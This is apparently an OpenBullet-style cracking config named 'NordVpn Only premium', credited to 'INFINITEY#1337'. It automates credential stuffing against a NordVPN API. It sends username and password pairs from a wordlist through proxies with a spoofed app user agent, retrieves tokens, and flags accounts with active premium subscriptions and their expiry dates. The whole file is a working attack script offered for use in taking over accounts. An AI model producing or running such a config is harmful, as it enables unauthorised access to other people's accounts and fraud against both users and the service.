[SETTINGS]
{
  "Name": "NordVpn Only premium",
  "SuggestedBots": 150,
  "LastModified": "2019-05-04T19:05:39.510091+02:00",
  "AdditionalInfo": "✘INFINITEY#1337 WHOLE LOTTA GANG SHIT",
  "Author": "INFINITEY#1337",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://zwyr157wwiu6eior.com/v1/users/tokens" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: NordApp android (playstore/2.8.6) Android 9.0.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#CHECK KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Unauthorized" 
  KEYCHAIN Retry OR 
    KEY "502: Bad gateway" 
#PARSE_TOKEN PARSE "<SOURCE>" LR "\"token\":\"" "\"" -> VAR "TOKEN" 
#ENCODE_TOKEN FUNCTION Base64Encode "token:<TOKEN>" -> VAR "ENCTOKEN" 
#GET_INFO REQUEST GET "https://zwyr157wwiu6eior.com/v1/users/services" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Basic <ENCTOKEN>" 
#PREMIUM_? KEYCHECK 
  KEYCHAIN Success OR 
    KEY "created_at" 
  KEYCHAIN Failure OR 
    KEY "[]" 
#PARSE_EXPIRATION PARSE "<SOURCE>" LR "\",\"expires_at\":\"" "\"" -> VAR "EX" 
#UNIX_TAHT_SHIT FUNCTION DateToUnixTime "yyyy-MM-dd HH:mm:ss" "<EX>" -> VAR "Unix" 
#CRURRENT FUNCTION CurrentUnixTime -> VAR "Current" 
#PREMIUM_:HYPE: KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Unix>" LessThan "<Current>" 
    KEY "<Current>" EqualTo "<Unix>" 
    KEY "<Current>" GreaterThan "<Unix>" 
#Expiration_Date_BY_INFINITEY PARSE "<SOURCE>" LR "\",\"expires_at\":\"" "\"" -> CAP "Expiration Date" "" " ✘CREDITS: INFINITEY#1337 " 
